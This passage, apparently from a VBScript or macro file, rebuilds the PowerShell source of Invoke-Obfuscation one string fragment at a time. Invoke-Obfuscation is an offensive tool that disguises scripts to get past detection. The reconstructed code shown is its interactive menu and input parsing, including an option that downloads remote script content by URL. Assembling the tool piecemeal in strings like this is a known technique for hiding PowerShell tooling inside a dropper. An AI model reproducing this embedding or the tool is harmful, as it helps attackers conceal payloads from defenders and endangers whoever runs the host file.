Ouzw = Ouzw + "bleInputOptionsLists += , $ExitCommandInputOption"
Ouzw = Ouzw + "s
$AllAvailableInputOptionsLists += , $HomeMe"
Ouzw = Ouzw + "nuInputOptions
# For Version 1.0 ASCII art is "
Ouzw = Ouzw + "not necessary.
#$AllAvailableInputOptionsLists"
Ouzw = Ouzw + " += , $ShowAsciiArtInputOptions
# Input opti"
Ouzw = Ouzw + "ons to change interactive menus.
$ExitInputOpt"
Ouzw = Ouzw + "ions = $ExitCommandInputOptions[0]
$MenuInputO"
Ouzw = Ouzw + "ptions = $BackCommandInputOptions[0]
# Ob"
Ouzw = Ouzw + "ligatory ASCII Art.
Show-AsciiArt
Start-Sl"
Ouzw = Ouzw + "eep -Seconds 2
# Show Help Menu once at b"
Ouzw = Ouzw + "eginning of script.
Show-HelpMenu
# M"
Ouzw = Ouzw + "ain loop for user interaction. Show-Menu function "
Ouzw = Ouzw + "displays current function along with acceptable in"
Ouzw = Ouzw + "put options (defined in arrays instantiated above)"
Ouzw = Ouzw + ".
# User input and validation is handled withi"
Ouzw = Ouzw + "n Show-Menu.
$UserResponse = ''
While($Exi"
Ouzw = Ouzw + "tInputOptions -NotContains ([String]$UserResponse)"
Ouzw = Ouzw + ".ToLower())
{
$UserResponse = ([String"
Ouzw = Ouzw + "]$UserResponse).Trim()
If($HomeMenuInputO"
Ouzw = Ouzw + "ptions[0] -Contains ([String]$UserResponse).ToLowe"
Ouzw = Ouzw + "r())
{
$UserResponse = ''
"
Ouzw = Ouzw + " }
# Display menu if it is defined in "
Ouzw = Ouzw + "a menu variable with $UserResponse in the variable"
Ouzw = Ouzw + " name.
If(Test-Path ('Variable:' + "MenuLe"
Ouzw = Ouzw + "vel$UserResponse"))
{
$UserRes"
Ouzw = Ouzw + "ponse = Show-Menu (Get-Variable "MenuLevel$UserRes"
Ouzw = Ouzw + "ponse").Value $UserResponse $Script:OptionsMenu
"
Ouzw = Ouzw + " }
Else
{
Write-E"
Ouzw = Ouzw + "rror "The variable MenuLevel$UserResponse does not"
Ouzw = Ouzw + " exist."
$UserResponse = 'quit'
"
Ouzw = Ouzw + " }
If(($UserResponse -eq 'quit')"
Ouzw = Ouzw + " -AND $CliWasSpecified -AND !$NoExitWasSpecified)
"
Ouzw = Ouzw + " {
Write-Output $Script:Obfusca"
Ouzw = Ouzw + "tedCommand.Trim("`n")
$UserInput = 'qu"
Ouzw = Ouzw + "it'
}
}
}
# Get location of this scr"
Ouzw = Ouzw + "ipt no matter what the current directory is for th"
Ouzw = Ouzw + "e process executing this script.
$ScriptDir = [Sys"
Ouzw = Ouzw + "tem.IO.Path]::GetDirectoryName($myInvocation.MyCom"
Ouzw = Ouzw + "mand.Definition)
Function Show-Menu
{
<#
.SYNOP"
Ouzw = Ouzw + "SIS
HELPER FUNCTION :: Displays current menu with"
Ouzw = Ouzw + " obfuscation navigation and application options fo"
Ouzw = Ouzw + "r Invoke-Obfuscation.
Invoke-Obfuscation Function"
Ouzw = Ouzw + ": Show-Menu
Author: Daniel Bohannon (@danielhbohan"
Ouzw = Ouzw + "non)
License: Apache License, Version 2.0
Required"
Ouzw = Ouzw + " Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + ".DESCRIPTION
Show-Menu displays current menu with"
Ouzw = Ouzw + " obfuscation navigation and application options fo"
Ouzw = Ouzw + "r Invoke-Obfuscation.
.PARAMETER Menu
Specifies "
Ouzw = Ouzw + "the menu options to display, with acceptable input"
Ouzw = Ouzw + " options parsed out of this array.
.PARAMETER Men"
Ouzw = Ouzw + "uName
Specifies the menu header display and the b"
Ouzw = Ouzw + "readcrumb used in the interactive prompt display.
"
Ouzw = Ouzw + "
.PARAMETER Script:OptionsMenu
Specifies the scri"
Ouzw = Ouzw + "pt-wide variable containing additional acceptable "
Ouzw = Ouzw + "input in addition to each menu's specific acceptab"
Ouzw = Ouzw + "le input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.)"
Ouzw = Ouzw + ".
.EXAMPLE
C:\PS> Show-Menu
.NOTES
This is a p"
Ouzw = Ouzw + "ersonal project developed by Daniel Bohannon while"
Ouzw = Ouzw + " an employee at MANDIANT, A FireEye Company.
.LIN"
Ouzw = Ouzw + "K
http://www.danielbohannon.com
#>
Param(
"
Ouzw = Ouzw + " [Parameter(ValueFromPipeline = $true)]
"
Ouzw = Ouzw + " [ValidateNotNullOrEmpty()]
[Object[]]
"
Ouzw = Ouzw + " $Menu,
[String]
$MenuName,"
Ouzw = Ouzw + "
[Object[]]
$Script:OptionsMenu
"
Ouzw = Ouzw + " )
# Extract all acceptable values from $Me"
Ouzw = Ouzw + "nu.
$AcceptableInput = @()
$SelectionConta"
Ouzw = Ouzw + "insCommand = $FALSE
ForEach($Line in $Menu)
"
Ouzw = Ouzw + " {
# If there are 4 items in each $Line i"
Ouzw = Ouzw + "n $Menu then the fourth item is a command to exec "
Ouzw = Ouzw + "if selected.
If($Line.Count -eq 4)
"
Ouzw = Ouzw + " {
$SelectionContainsCommand = $TRUE
"
Ouzw = Ouzw + " }
$AcceptableInput += ($Line[1]).Tr"
Ouzw = Ouzw + "im(' ')
}
$UserInput = $NULL
Whi"
Ouzw = Ouzw + "le($AcceptableInput -NotContains $UserInput)
{"
Ouzw = Ouzw + "
# Format custom breadcrumb prompt.
"
Ouzw = Ouzw + " Write-Host "`n"
$BreadCrumb = $MenuName."
Ouzw = Ouzw + "Trim('_')
If($BreadCrumb.Length -gt 1)
"
Ouzw = Ouzw + " {
If($BreadCrumb.ToLower() -eq 's"
Ouzw = Ouzw + "how options')
{
$Bread"
Ouzw = Ouzw + "Crumb = 'Show Options'
}
I"
Ouzw = Ouzw + "f($MenuName -ne '')
{
"
Ouzw = Ouzw + "# Handle specific case substitutions from what is "
Ouzw = Ouzw + "ALL CAPS in interactive menu and then correct casi"
Ouzw = Ouzw + "ng we want to appear in the Breadcrumb.
"
Ouzw = Ouzw + " $BreadCrumbOCD = @()
$Bre"
Ouzw = Ouzw + "adCrumbOCD += , @('ps' ,'PS')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('cmd' ,'Cmd')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('wmic' ,'Wmic')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('rundll' ,'Ru"
Ouzw = Ouzw + "nDll')
$BreadCrumbOCD += , @('var+"
Ouzw = Ouzw + "' ,'Var+')
$BreadCrumbOCD += , "
Ouzw = Ouzw + "@('stdin+' ,'StdIn+')
$BreadCrumb"
Ouzw = Ouzw + "OCD += , @('clip+' ,'Clip+')
$Br"
Ouzw = Ouzw + "eadCrumbOCD += , @('var++' ,'Var++')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('stdin++' ,'StdIn++')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('clip++' ,'C"
Ouzw = Ouzw + "lip++')
$BreadCrumbOCD += , @('run"
Ouzw = Ouzw + "dll++','RunDll++')
$BreadCrumbOCD "
Ouzw = Ouzw + "+= , @('mshta++' ,'Mshta++')
$Bre"
Ouzw = Ouzw + "adCrumbArray = @()
ForEach($Crumb "
Ouzw = Ouzw + "in $BreadCrumb.Split('_'))
{
"
Ouzw = Ouzw + " # Perform casing substitutions for "
Ouzw = Ouzw + "any matches in $BreadCrumbOCD array.
"
Ouzw = Ouzw + " $StillLookingForSubstitution = $TRUE
"
Ouzw = Ouzw + " ForEach($Substitution in $BreadCrumb"
Ouzw = Ouzw + "OCD)
{
"
Ouzw = Ouzw + " If($Crumb.ToLower() -eq $Substitution[0])
"
Ouzw = Ouzw + " {
$Br"
Ouzw = Ouzw + "eadCrumbArray += $Substitution[1]
"
Ouzw = Ouzw + " $StillLookingForSubstitution = $FALSE
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " # If no substitution occurred a"
Ouzw = Ouzw + "bove then simply upper-case the first character an"
Ouzw = Ouzw + "d lower-case all the remaining characters.
"
Ouzw = Ouzw + " If($StillLookingForSubstitution)
"
Ouzw = Ouzw + " {
$BreadCr"
Ouzw = Ouzw + "umbArray += $Crumb.SubString(0,1).ToUpper() + $Cru"
Ouzw = Ouzw + "mb.SubString(1).ToLower()
"
Ouzw = Ouzw + " # If no substitution was found for the 3rd or lat"
Ouzw = Ouzw + "er BreadCrumb element (only for Launcher BreadCrum"
Ouzw = Ouzw + "b) then throw a warning so we can add this substit"
Ouzw = Ouzw + "ution pair to $BreadCrumbOCD.
"
Ouzw = Ouzw + " If(($BreadCrumb.Split('_').Count -eq 2) -AND ("
Ouzw = Ouzw + "$BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb "
Ouzw = Ouzw + "-ne 'Launcher'))
{
"
Ouzw = Ouzw + " Write-Warning "No substituion"
Ouzw = Ouzw + " pair was found for `$Crumb=$Crumb in `$BreadCrumb"
Ouzw = Ouzw + "=$BreadCrumb. Add this `$Crumb substitution pair t"
Ouzw = Ouzw + "o `$BreadCrumbOCD array in Invoke-Obfuscation."
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " }
$BreadCrumb = $Bread"
Ouzw = Ouzw + "CrumbArray -Join '\'
}
$Br"
Ouzw = Ouzw + "eadCrumb = '\' + $BreadCrumb
}
"
Ouzw = Ouzw + " # Output menu heading.
$FirstLine = "
Ouzw = Ouzw + ""Choose one of the below "
If($BreadCrumb "
Ouzw = Ouzw + "-ne '')
{
$FirstLine = $FirstL"
Ouzw = Ouzw + "ine + $BreadCrumb.Trim('\') + ' '
}
"
Ouzw = Ouzw + " Write-Host "$FirstLine" -NoNewLine
"
Ouzw = Ouzw + " # Change color and verbiage if selection will "
Ouzw = Ouzw + "execute command.
If($SelectionContainsComm"
Ouzw = Ouzw + "and)
{
Write-Host "options" -N"
Ouzw = Ouzw + "oNewLine -ForegroundColor Green
Write-"
Ouzw = Ouzw + "Host " to" -NoNewLine
Write-Host " APP"
Ouzw = Ouzw + "LY" -NoNewLine -ForegroundColor Green
"
Ouzw = Ouzw + "Write-Host " to current payload" -NoNewLine
"
Ouzw = Ouzw + " }
Else
{
Write-Host "
Ouzw = Ouzw + ""options" -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " }
Write-Host ":`n"
ForEach"
Ouzw = Ouzw + "($Line in $Menu)
{
$LineSpace "
Ouzw = Ouzw + " = $Line[0]
$LineOption = $Line[1]
"
Ouzw = Ouzw + " $LineValue = $Line[2]
Write-"
Ouzw = Ouzw + "Host $LineSpace -NoNewLine
# If not e"
Ouzw = Ouzw + "mpty then include breadcrumb in $LineOption output"
Ouzw = Ouzw + " (is not colored and won't affect user input synta"
Ouzw = Ouzw + "x).
If(($BreadCrumb -ne '') -AND ($Lin"
Ouzw = Ouzw + "eSpace.StartsWith('[')))
{
"
Ouzw = Ouzw + " Write-Host ($BreadCrumb.ToUpper().Trim('\') +"
Ouzw = Ouzw + " '\') -NoNewLine
}
"
Ouzw = Ouzw + " # Change color if selection will execute com"
Ouzw = Ouzw + "mand.
If($SelectionContainsCommand)
"
Ouzw = Ouzw + " {
Write-Host $LineOption"
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Green
}
"
Ouzw = Ouzw + " Else
{
Writ"
Ouzw = Ouzw + "e-Host $LineOption -NoNewLine -ForegroundColor Yel"
Ouzw = Ouzw + "low
}
# Add a"
Ouzw = Ouzw + "dditional coloring to string encapsulated by <> if"
Ouzw = Ouzw + " it exists in $LineValue.
If($LineValu"
Ouzw = Ouzw + "e.Contains('<') -AND $LineValue.Contains('>'))
"
Ouzw = Ouzw + " {
$FirstPart = $LineValu"
Ouzw = Ouzw + "e.SubString(0,$LineValue.IndexOf('<'))
"
Ouzw = Ouzw + " $MiddlePart = $LineValue.SubString($FirstPart"
Ouzw = Ouzw + ".Length+1)
$MiddlePart = $MiddlePa"
Ouzw = Ouzw + "rt.SubString(0,$MiddlePart.IndexOf('>'))
"
Ouzw = Ouzw + " $LastPart = $LineValue.SubString($FirstPa"
Ouzw = Ouzw + "rt.Length+$MiddlePart.Length+2)
Wr"
Ouzw = Ouzw + "ite-Host "`t$FirstPart" -NoNewLine
"
Ouzw = Ouzw + " Write-Host $MiddlePart -NoNewLine -ForegroundColo"
Ouzw = Ouzw + "r Cyan
# Handle if more than one "
Ouzw = Ouzw + "term needs to be output in different color.
"
Ouzw = Ouzw + " If($LastPart.Contains('<') -AND $LastPar"
Ouzw = Ouzw + "t.Contains('>'))
{
"
Ouzw = Ouzw + " $LineValue = $LastPart
$"
Ouzw = Ouzw + "FirstPart = $LineValue.SubString(0,$LineValue.Ind"
Ouzw = Ouzw + "exOf('<'))
$MiddlePart = $Line"
Ouzw = Ouzw + "Value.SubString($FirstPart.Length+1)
"
Ouzw = Ouzw + " $MiddlePart = $MiddlePart.SubString(0,$Midd"
Ouzw = Ouzw + "lePart.IndexOf('>'))
$LastPart"
Ouzw = Ouzw + " = $LineValue.SubString($FirstPart.Length+$Middl"
Ouzw = Ouzw + "ePart.Length+2)
Write-Host "$F"
Ouzw = Ouzw + "irstPart" -NoNewLine
Write-Hos"
Ouzw = Ouzw + "t $MiddlePart -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Write-Host $LastPa"
Ouzw = Ouzw + "rt
}
Else
{
"
Ouzw = Ouzw + " Write-Host "`t$LineValue"
"
Ouzw = Ouzw + " }
}
# Prompt for user i"
Ouzw = Ouzw + "nput with custom breadcrumb prompt.
Write-"
Ouzw = Ouzw + "Host ''
If($UserInput -ne '') {Write-Host "
Ouzw = Ouzw + "''}
$UserInput = ''
While"
Ouzw = Ouzw + "(($UserInput -eq '') -AND ($Script:CompoundCommand"
Ouzw = Ouzw + ".Count -eq 0))
{
# Output cust"
Ouzw = Ouzw + "om prompt.
Write-Host "Invoke-Obfuscat"
Ouzw = Ouzw + "ion$BreadCrumb> " -NoNewLine -ForegroundColor Mage"
Ouzw = Ouzw + "nta
# Get interactive user input if C"
Ouzw = Ouzw + "liCommands input variable was not specified by use"
Ouzw = Ouzw + "r.
If(($Script:CliCommands.Count -gt 0"
Ouzw = Ouzw + ") -OR ($Script:CliCommands -ne $NULL))
"
Ouzw = Ouzw + " {
If($Script:CliCommands.GetType("
Ouzw = Ouzw + ").Name -eq 'String')
{
"
Ouzw = Ouzw + " $NextCliCommand = $Script:CliCommands.Tri"
Ouzw = Ouzw + "m()
$Script:CliCommands = @()
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
$NextCliCommand = ([Str"
Ouzw = Ouzw + "ing]$Script:CliCommands[0]).Trim()
"
Ouzw = Ouzw + " $Script:CliCommands = For($i=1; $i -lt $Scrip"
Ouzw = Ouzw + "t:CliCommands.Count; $i++) {$Script:CliCommands[$i"
Ouzw = Ouzw + "]}
}
$UserInput ="
Ouzw = Ouzw + " $NextCliCommand
}
Else
"
Ouzw = Ouzw + " {
# If Command was defin"
Ouzw = Ouzw + "ed on command line and NoExit switch was not defin"
Ouzw = Ouzw + "ed then output final ObfuscatedCommand to stdout a"
Ouzw = Ouzw + "nd then quit. Otherwise continue with interactive "
Ouzw = Ouzw + "Invoke-Obfuscation.
If($CliWasSpec"
Ouzw = Ouzw + "ified -AND ($Script:CliCommands.Count -lt 1) -AND "
Ouzw = Ouzw + "($Script:CompoundCommand.Count -lt 1) -AND ($Scrip"
Ouzw = Ouzw + "t:QuietWasSpecified -OR !$NoExitWasSpecified))
"
Ouzw = Ouzw + " {
If($Script:Quie"
Ouzw = Ouzw + "tWasSpecified)
{
"
Ouzw = Ouzw + " # Remove Write-Host and Start-Sleep pro"
Ouzw = Ouzw + "xy functions so that Write-Host and Start-Sleep cm"
Ouzw = Ouzw + "dlets will be called during the remainder of the i"
Ouzw = Ouzw + "nteractive Invoke-Obfuscation session.
"
Ouzw = Ouzw + " Remove-Item -Path Function:Write-Host"
Ouzw = Ouzw + "
Remove-Item -Path Functio"
Ouzw = Ouzw + "n:Start-Sleep
$Script:Qui"
Ouzw = Ouzw + "etWasSpecified = $FALSE
#"
Ouzw = Ouzw + " Automatically run 'Show Options' so the user has "
Ouzw = Ouzw + "context of what has successfully been executed.
"
Ouzw = Ouzw + " $UserInput = 'show options'"
Ouzw = Ouzw + "
$BreadCrumb = 'Show Optio"
Ouzw = Ouzw + "ns'
}
# -N"
Ouzw = Ouzw + "oExit wasn't specified and -Command was, so we wil"
Ouzw = Ouzw + "l output the result back in the main While loop.
"
Ouzw = Ouzw + " If(!$NoExitWasSpecified)
"
Ouzw = Ouzw + " {
$UserInput"
Ouzw = Ouzw + " = 'quit'
}
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " $UserInput = (Read-Host).Trim()
"
Ouzw = Ouzw + " }
# Process interactive Us"
Ouzw = Ouzw + "erInput using CLI syntax, so comma-delimited and s"
Ouzw = Ouzw + "lash-delimited commands can be processed interacti"
Ouzw = Ouzw + "vely.
If(($Script:CliCommands.Coun"
Ouzw = Ouzw + "t -eq 0) -AND !$UserInput.ToLower().StartsWith('se"
Ouzw = Ouzw + "t ') -AND $UserInput.Contains(','))
"
Ouzw = Ouzw + " {
$Script:CliCommands = $Use"
Ouzw = Ouzw + "rInput.Split(',')
"
Ouzw = Ouzw + " # Reset $UserInput so current While loop "
Ouzw = Ouzw + "will be traversed once more and process UserInput "
Ouzw = Ouzw + "command as a CliCommand.
$User"
Ouzw = Ouzw + "Input = ''
}
}
"
Ouzw = Ouzw + " }
# Trim any leading trailing slashes so"
Ouzw = Ouzw + " it doesn't misinterpret it as a compound command "
Ouzw = Ouzw + "unnecessarily.
$UserInput = $UserInput.Tri"
Ouzw = Ouzw + "m('/\')
# Cause UserInput of base menu le"
Ouzw = Ouzw + "vel directories to automatically work.
# T"
Ouzw = Ouzw + "he only exception is STRING if the current MenuNam"
Ouzw = Ouzw + "e is _token since it can be the base menu STRING o"
Ouzw = Ouzw + "r TOKEN/STRING.
If((($MenuLevel | ForEach-"
Ouzw = Ouzw + "Object {$_[1].Trim()}) -Contains $UserInput.Split("
Ouzw = Ouzw + "'/\')[0]) -AND !(('string' -Contains $UserInput.Sp"
Ouzw = Ouzw + "lit('/\')[0]) -AND ($MenuName -eq '_token')) -AND "
Ouzw = Ouzw + "($MenuName -ne ''))
{
$UserInp"
Ouzw = Ouzw + "ut = 'home/' + $UserInput.Trim()
}
"
Ouzw = Ouzw + " # If current command contains \ or / and does no"
Ouzw = Ouzw + "t start with SET or OUT then we are dealing with a"
Ouzw = Ouzw + " compound command.
# Setting $Script:Compo"
Ouzw = Ouzw + "unCommand in below IF block.
If(($Script:C"
Ouzw = Ouzw + "ompoundCommand.Count -eq 0) -AND !$UserInput.ToLow"
Ouzw = Ouzw + "er().StartsWith('set ') -AND !$UserInput.ToLower()"
Ouzw = Ouzw + ".StartsWith('out ') -AND ($UserInput.Contains('\')"
Ouzw = Ouzw + " -OR $UserInput.Contains('/')))
{
"
Ouzw = Ouzw + " $Script:CompoundCommand = $UserInput.Split('/\"
Ouzw = Ouzw + "')
}
# If current command contain"
Ouzw = Ouzw + "s \ or / and does not start with SET then we are d"
Ouzw = Ouzw + "ealing with a compound command.
# Parsing "
Ouzw = Ouzw + "out next command from $Script:CompounCommand in be"
Ouzw = Ouzw + "low IF block.
If($Script:CompoundCommand.C"
Ouzw = Ouzw + "ount -gt 0)
{
$UserInput = ''
"
Ouzw = Ouzw + " While(($UserInput -eq '') -AND ($Scrip"
Ouzw = Ouzw + "t:CompoundCommand.Count -gt 0))
{
"
Ouzw = Ouzw + " # If last compound command then it wil"
Ouzw = Ouzw + "l be a string.
If($Script:Compound"
Ouzw = Ouzw + "Command.GetType().Name -eq 'String')
"
Ouzw = Ouzw + " {
$NextCompoundCommand = $S"
Ouzw = Ouzw + "cript:CompoundCommand.Trim()
$"
Ouzw = Ouzw + "Script:CompoundCommand = @()
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # If there are more commands left in compoun"
Ouzw = Ouzw + "d command then it won't be a string (above IF bloc"
Ouzw = Ouzw + "k).
# In this else block we ge"
Ouzw = Ouzw + "t the next command from CompoundCommand array.
"
Ouzw = Ouzw + " $NextCompoundCommand = ([String]$"
Ouzw = Ouzw + "Script:CompoundCommand[0]).Trim()
"
Ouzw = Ouzw + "
# Set remaining commands "
Ouzw = Ouzw + "back into CompoundCommand.
$Te"
Ouzw = Ouzw + "mp = $Script:CompoundCommand
$"
Ouzw = Ouzw + "Script:CompoundCommand = @()
F"
Ouzw = Ouzw + "or($i=1; $i -lt $Temp.Count; $i++)
"
Ouzw = Ouzw + " {
$Script:CompoundCom"
Ouzw = Ouzw + "mand += $Temp[$i]
}
"
Ouzw = Ouzw + " }
$UserInput = $NextCompound"
Ouzw = Ouzw + "Command
}
}
# Handle "
Ouzw = Ouzw + "new RegEx functionality.
# Identify if the"
Ouzw = Ouzw + "re is any regex in current UserInput by removing a"
Ouzw = Ouzw + "ll alphanumeric characters (and + or # which are f"
Ouzw = Ouzw + "ound in launcher names).
$TempUserInput = "
Ouzw = Ouzw + "$UserInput.ToLower()
@(97..122) | ForEach-"
Ouzw = Ouzw + "Object {$TempUserInput = $TempUserInput.Replace([S"
Ouzw = Ouzw + "tring]([Char]$_),'')}
@(0..9) | ForEach"
Ouzw = Ouzw + "-Object {$TempUserInput = $TempUserInput.Replace($"
Ouzw = Ouzw + "_,'')}
$TempUserInput = $TempUserInput.Rep"
Ouzw = Ouzw + "lace(' ','').Replace('+','').Replace('#','').Repla"
Ouzw = Ouzw + "ce('\','').Replace('/','').Replace('-','').Replace"
Ouzw = Ouzw + "('?','')
If(($TempUserInput.Length -gt 0)"
Ouzw = Ouzw + " -AND !($UserInput.Trim().ToLower().StartsWith('se"
Ouzw = Ouzw + "t ')) -AND !($UserInput.Trim().ToLower().StartsWit"
Ouzw = Ouzw + "h('out ')))
{
# Replace any si"
Ouzw = Ouzw + "mple wildcard with .* syntax.
$UserInp"
Ouzw = Ouzw + "ut = $UserInput.Replace('.*','_____').Replace('*',"
Ouzw = Ouzw + "'.*').Replace('_____','.*')
# Prepend"
Ouzw = Ouzw + " UserInput with ^ and append with $ if not already"
Ouzw = Ouzw + " there.
If(!$UserInput.Trim().StartsWi"
Ouzw = Ouzw + "th('^') -AND !$UserInput.Trim().StartsWith('.*'))
"
Ouzw = Ouzw + " {
$UserInput = '^' + $"
Ouzw = Ouzw + "UserInput
}
If(!$UserInput"
Ouzw = Ouzw + ".Trim().EndsWith('$') -AND !$UserInput.Trim().Ends"
Ouzw = Ouzw + "With('.*'))
{
$UserInp"
Ouzw = Ouzw + "ut = $UserInput + '$'
}
#"
Ouzw = Ouzw + " See if there are any filtered matches in the curr"
Ouzw = Ouzw + "ent menu.
Try
{
"
Ouzw = Ouzw + " $MenuFiltered = ($Menu | Where-Object {($_[1"
Ouzw = Ouzw + "].Trim() -Match $UserInput) -AND ($_[1].Trim().Len"
Ouzw = Ouzw + "gth -gt 0)} | ForEach-Object {$_[1].Trim()})
"
Ouzw = Ouzw + " }
Catch
{
"
Ouzw = Ouzw + " # Output error message if Regular Expressio"
Ouzw = Ouzw + "n causes error in above filtering step.
"
Ouzw = Ouzw + " # E.g. Using *+ instead of *[+]
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -Foreground"
Ouzw = Ouzw + "Color Red
Write-Host ' The current"
Ouzw = Ouzw + " Regular Expression caused the following error:'
"
Ouzw = Ouzw + " write-host " $_" -ForegroundC"
Ouzw = Ouzw + "olor Red
}
# If there are"
Ouzw = Ouzw + " filtered matches in the current menu then randoml"
Ouzw = Ouzw + "y choose one for the UserInput value.
"
Ouzw = Ouzw + "If($MenuFiltered -ne $NULL)
{
"
Ouzw = Ouzw + " # Randomly select UserInput from filtered "
Ouzw = Ouzw + "options.
$UserInput = (Get-Random "
Ouzw = Ouzw + "-Input $MenuFiltered).Trim()
# Ou"
Ouzw = Ouzw + "tput randomly chosen option (and filtered options "
Ouzw = Ouzw + "selected from) if more than one option were return"
Ouzw = Ouzw + "ed from regex.
If($MenuFiltered.Co"
Ouzw = Ouzw + "unt -gt 1)
{
#"
Ouzw = Ouzw + " Change color and verbiage if acceptable options w"
Ouzw = Ouzw + "ill execute an obfuscation function.
"
Ouzw = Ouzw + " If($SelectionContainsCommand)
"
Ouzw = Ouzw + " {
$ColorToOutput = "
Ouzw = Ouzw + "'Green'
}
"
Ouzw = Ouzw + "Else
{
"
Ouzw = Ouzw + " $ColorToOutput = 'Yellow'
}
"
Ouzw = Ouzw + " Write-Host "`n`nRandomly selec"
Ouzw = Ouzw + "ted " -NoNewline
Write-Host $U"
Ouzw = Ouzw + "serInput -NoNewline -ForegroundColor $ColorToOutpu"
Ouzw = Ouzw + "t
write-host " from the follow"
Ouzw = Ouzw + "ing filtered options: " -NoNewline
"
Ouzw = Ouzw + " For($i=0; $i -lt $MenuFiltered.Count-1; $i++"
Ouzw = Ouzw + ")
{
Wr"
Ouzw = Ouzw + "ite-Host $MenuFiltered[$i].Trim() -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor $ColorToOutput
"
Ouzw = Ouzw + " Write-Host ', ' -NoNewLine
}
"
Ouzw = Ouzw + " Write-Host $MenuFiltered[$Menu"
Ouzw = Ouzw + "Filtered.Count-1].Trim() -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or $ColorToOutput
}
}
"
Ouzw = Ouzw + " }
# If $UserInput is all numbers "
Ouzw = Ouzw + "and is in a menu in $MenusWithMultiSelectNumbers
"
Ouzw = Ouzw + " $OverrideAcceptableInput = $FALSE
$"
Ouzw = Ouzw + "MenusWithMultiSelectNumbers = @('\Launcher')
"
Ouzw = Ouzw + " If(($UserInput.Trim(' 0123456789').Length -eq 0"
Ouzw = Ouzw + ") -AND $BreadCrumb.Contains('\') -AND ($MenusWithM"
Ouzw = Ouzw + "ultiSelectNumbers -Contains $BreadCrumb.SubString("
Ouzw = Ouzw + "0,$BreadCrumb.LastIndexOf('\'))))
{
"
Ouzw = Ouzw + " $OverrideAcceptableInput = $TRUE
}
"
Ouzw = Ouzw + "
If($ExitInputOptions -Contains $Us"
Ouzw = Ouzw + "erInput.ToLower())
{
Return $E"
Ouzw = Ouzw + "xitInputOptions[0]
}
ElseIf($MenuI"
Ouzw = Ouzw + "nputOptions -Contains $UserInput.ToLower())
"
Ouzw = Ouzw + " {
# Commands like 'back' that will r"
Ouzw = Ouzw + "eturn user to previous interactive menu.
"
Ouzw = Ouzw + " If($BreadCrumb.Contains('\')) {$UserInput = $Br"
Ouzw = Ouzw + "eadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\'))"
Ouzw = Ouzw + ".Replace('\','_')}
Else {$UserInput = "
Ouzw = Ouzw + "''}
Return $UserInput.ToLower()
"
Ouzw = Ouzw + " }
ElseIf($HomeMenuInputOptions[0] -Cont"
Ouzw = Ouzw + "ains $UserInput.ToLower())
{
R"
Ouzw = Ouzw + "eturn $UserInput.ToLower()
}
ElseI"
Ouzw = Ouzw + "f($UserInput.ToLower().StartsWith('set '))
"
Ouzw = Ouzw + " {
# Extract $UserInputOptionName and "
Ouzw = Ouzw + "$UserInputOptionValue from $UserInput SET command."
Ouzw = Ouzw + "
$UserInputOptionName = $NULL
"
Ouzw = Ouzw + " $UserInputOptionValue = $NULL
$Ha"
Ouzw = Ouzw + "sError = $FALSE
$UserInputMinusSe"
Ouzw = Ouzw + "t = $UserInput.SubString(4).Trim()
If("
Ouzw = Ouzw + "$UserInputMinusSet.IndexOf(' ') -eq -1)
"
Ouzw = Ouzw + " {
$HasError = $TRUE
"
Ouzw = Ouzw + " $UserInputOptionName = $UserInputMinusSet.Tri"
Ouzw = Ouzw + "m()
}
Else
{
"
Ouzw = Ouzw + " $UserInputOptionName = $UserInputM"
Ouzw = Ouzw + "inusSet.SubString(0,$UserInputMinusSet.IndexOf(' '"
Ouzw = Ouzw + ")).Trim().ToLower()
$UserInputOpti"
Ouzw = Ouzw + "onValue = $UserInputMinusSet.SubString($UserInputM"
Ouzw = Ouzw + "inusSet.IndexOf(' ')).Trim()
}
"
Ouzw = Ouzw + " # Validate that $UserInputOptionName is defi"
Ouzw = Ouzw + "ned in $SettableInputOptions.
If($Sett"
Ouzw = Ouzw + "ableInputOptions -Contains $UserInputOptionName)
"
Ouzw = Ouzw + " {
# Perform separate va"
Ouzw = Ouzw + "lidation for $UserInputOptionValue before setting "
Ouzw = Ouzw + "value. Set to 'emptyvalue' if no value was entered"
Ouzw = Ouzw + ".
If($UserInputOptionValue.Length "
Ouzw = Ouzw + "-eq 0) {$UserInputOptionName = 'emptyvalue'}
"
Ouzw = Ouzw + " Switch($UserInputOptionName.ToLower())
"
Ouzw = Ouzw + " {
'scriptpath'"
Ouzw = Ouzw + " {
If($UserInputOptionValu"
Ouzw = Ouzw + "e -AND ((Test-Path $UserInputOptionValue) -OR ($Us"
Ouzw = Ouzw + "erInputOptionValue -Match '(http|https)://')))
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # Reset ScriptBlock in case it contained a value."
Ouzw = Ouzw + "
$Script:ScriptBlock ="
Ouzw = Ouzw + " ''
"
Ouzw = Ouzw + " # Check if user-input ScriptPath is a URL o"
Ouzw = Ouzw + "r a directory.
If($Use"
Ouzw = Ouzw + "rInputOptionValue -Match '(http|https)://')
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # ScriptPath is a URL.
"
Ouzw = Ouzw + "
# Download"
Ouzw = Ouzw + " content.
$Script:"
Ouzw = Ouzw + "ScriptBlock = (New-Object Net.WebClient).DownloadS"
Ouzw = Ouzw + "tring($UserInputOptionValue)
"
Ouzw = Ouzw + "
# Set scri"
Ouzw = Ouzw + "pt-wide variables for future reference.
"
Ouzw = Ouzw + " $Script:ScriptPath "
